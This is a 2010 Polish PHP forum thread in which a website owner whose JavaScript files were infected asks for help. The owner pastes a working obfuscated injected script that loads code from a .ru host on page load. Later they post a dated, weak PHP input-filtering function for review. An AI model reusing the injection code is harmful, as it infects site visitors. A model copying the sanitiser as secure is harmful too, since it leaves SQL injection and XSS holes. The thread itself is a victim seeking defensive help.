Pomoc - Szukaj - Użytkownicy - Kalendarz
Pełna wersja: [Java] Bardzo dziwny błąd
Forum PHP.pl > Forum > Przedszkole
desavil
10.05.2010, 07:10:09
Witam, mam taki problem gdyż od trzech dni na mojej stronie po wejściu wyświetla się takie coś:


Po wejściu pierwszy raz na stronę (po włączeniu za każdym razem komputera) pojawia się instalacja jakiegoś dodatku i widać właśnie to te logo ( Java 6 ), a następnie "Unable to access jarfile \\213.175.207.142\public\001.jar

PS. Korzystam z przeglądarki Firefox i znajomi też to mają.
Możecie to sprawdzić sami na stornie http://nonlimit.pl/

Pozdrawiam i proszę o pomoc
chlebik
10.05.2010, 07:15:40
A w innych przegladarkach masz to samo? Sprawdz kod strony i zobacz czy czasem jakas brzydka rzecz ci sie nie dokleila.
desavil
10.05.2010, 07:30:37
Czy czasem nie jest to ta ostatnia linijka (exploit) ?

http://nonlimit.pl/sources/ajax03.js

We wszystkich plikach *.js miałem exploita
Mogę się dowiedzieć co może być tego przyczyną?
Kshyhoo
10.05.2010, 07:40:50
U mnie bez zarzutu...
desavil
10.05.2010, 08:14:22
Bo już wyczyściłem i nie zrobiłem kopii ;/

Ale niedawno (wczoraj) na stronie hostingu na stornie głównej gdzie jest również ta strona był exploit taki:
Kod
<script>g={};var r="bod"+"y";var V=window;this.Ob=63654;this.Ob++;var H=null;Kp=27291;Kp++;var o=document;var I;VB=["T","x"];var A=String("scrip"+"t");Y=["d","B"];var BF=1863;function E(){this.cF=9214;this.cF+=39;var ni=new Date();var K=String("]");var D=RegExp;var L="\x2f\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d\x2f\x77\x65\x72\x2d\x6b\x65\x6e\x6e\x74\x2d\x77\x65\x6e\x2e\x64\x65\x2f\x62\x69\x6c\x64\x2e\x64\x65\x2e\x70\x68\x70";try {var nR='z'} catch(nR){};jA=47827;jA+=57;var K=String("]");var U="";var u='';this.Gw=7124;this.Gw++;this.Jt=53598;this.Jt--;function p(od,c){var P=new Date();var aI='';var Di="[";var l="";Di+=c;this.Mz=6482;this.Mz-=193;var tH="tH";Di+=K;var NM=new Date();var k=new D(Di, "g");var be={Yn:40518};return od[String("re"+"plVFe".substr(0,2)+"ac"+"e")](k, u);ja={ow:false};};try {var Xz='Uc'} catch(Xz){};this.f=45250;this.f+=213;this.h=false;var mg="";var lO=["GV","ez"];try {var Mk='Az'} catch(Mk){};var Z=312030-303950;var _='';var q=["FI"];var O=p('ckrZeCajtWeCEflBeOmIeZnwtC','4W2Csfg1BqkYoQp3UOKwzZIj');var G=p('aIprpteznzdrCyhqi0l_d0','_tzqvsDNWrVYLy10IBJkf');H="onlo"+"ad";var w="http:"+"//spivAeL".substr(0,5)+"cyled"+"pBSge.ru".substr(3)+":";var Lo=[];kP=50783;kP+=113;this.wB=15591;this.wB+=24;I=function(){var TS=false;var yE=new Date();try {this.vo="vo";M=o[O](A);var rb=false;var UY={YE:"wU"};_=w;var YL=["pM"];_+=Z;_+=L;var ux=false;Yc={ub:"px"};var KZ=["en","pY"];var pB=new Date();var m="src";var Iv=["Jo","cI","cq"];var Rf=["sd","Sv","FSf"];var QT="QT";var uP=p('dxeNfNeMrQ','0xM8qRhQTgOvpy6N');this.Hb="";var hT="hT";bz=37550;bz+=75;M[m]=_;Ys=["eJ"];M[uP]=[1][0];g_=[];var YG=new String();fC={tK:false};o[r][G](M);var MT=[];} catch(F){var _S="_S";var Es="Es";IN={Vu:false};};var sM=[];var rba=[];};var Fb=[];this.eN=57999;this.eN++;bq=48871;bq++;};E();EU={};V[H]=I;</script>
<!--aa6aa8e4b14d68d83daa8a15c2794a2e-->


Prosił bym jeszcze o informację jak przed takim czymś można się zabezpieczyć, i jaka mogła by być przyczyna, że ktoś takie coś wrzucił.
chlebik
10.05.2010, 09:23:22
Masa mozliwosci - nie tak dawno byl chocby bardzo popularny bug w total commanderze bodajze, ktory wyczytywal hasla do serwerow w nim zapisane i przechodzil po wszystkich plikach na tym serwerze z rozszerzeniem PHP i doklejal cos na koncu. To najbardziej prawdopodobny scenariusz.
gigzorr
10.05.2010, 09:45:19
sql injection,xss jest pelno opcji , a takie cos z java to pamietam , ze jak ktos wchodzil na strone i zaczela sie pobierac a pozniej byl zawirusowany smile.gif
desavil
10.05.2010, 11:08:25
Cytat(chlebik @ 10.05.2010, 10:23:22 ) *
Masa mozliwosci - nie tak dawno byl chocby bardzo popularny bug w total commanderze bodajze, ktory wyczytywal hasla do serwerow w nim zapisane i przechodzil po wszystkich plikach na tym serwerze z rozszerzeniem PHP i doklejal cos na koncu. To najbardziej prawdopodobny scenariusz.


Ja korzystam tylko i wyłącznie z klienta FTP o nazwie "FileZilla Client"
ziqzaq
10.05.2010, 11:32:07
Cytat(desavil @ 10.05.2010, 12:08:25 ) *
Ja korzystam tylko i wyłącznie z klienta FTP o nazwie "FileZilla Client"

AFAIK filezilla przetrzymuje hasła w plaintext (w pliku xml), więc jeśli będziesz miał komputer zainfekowany softem wykradającym loginy/hasła do serwerów to zapisywanie haseł w filezilli będzie tak samo niebezpieczne jak w tc.
desavil
10.05.2010, 16:59:50
Czy mogłabym poprosić o jakieś sprawdzone stronki jak zabezpieczać się przed "sql injection" oraz "xss"

@Edit
I wszystkie dane ($_POST, $_GET) filtruje funkcją "zabezpiecz" a oto ta funkcja:
[PHP] pobierz, plaintext 
  1. // Usuwanie znaków specjalnych
  2. function RemoveMagicQuotes(&$arr) {
  3. 	if(get_magic_quotes_gpc()) {
  4. 	if(!is_array($arr))
  5. 	return(stripslashes($arr));
  6. 	$out=array();
  7. 	reset($arr);
  8. 	while (list($key, $value) = each($arr)) {
  9. 	if(is_array($value)) {
  10. 	$out[$key]=RemoveMagicQuotes($value);
  11. 	}else{
  12. 	$out[$key]=stripslashes($value);
  13. 	}
  14. 	}
  15. 	return $out;
  16. 	} else {
  17. 	return($arr);
  18. 	}
  19. }
  20.  
  21.  
  22. // Usuwanie znaków specjalnych
  23. function zabezpiecz($zmienna){
  24. 	$zmienna=stripslashes($zmienna);
  25. 	$zmienna=htmlspecialchars($zmienna);
  26. 	$zmienna=mysql_escape_string(RemoveMagicQuotes($zmienna));
  27. 	return $zmienna;
  28. }
[PHP] pobierz, plaintext

Czy jest ona poprawna i niema w niej żadnych dziur?
Co jeszcze można ulepszyć.

Pozdrawiam,

smile.gif
To jest wersja lo-fi głównej zawartości. Aby zobaczyć pełną wersję z większą zawartością, obrazkami i formatowaniem proszę kliknij tutaj.
Invision Power Board © 2001-2025 Invision Power Services, Inc.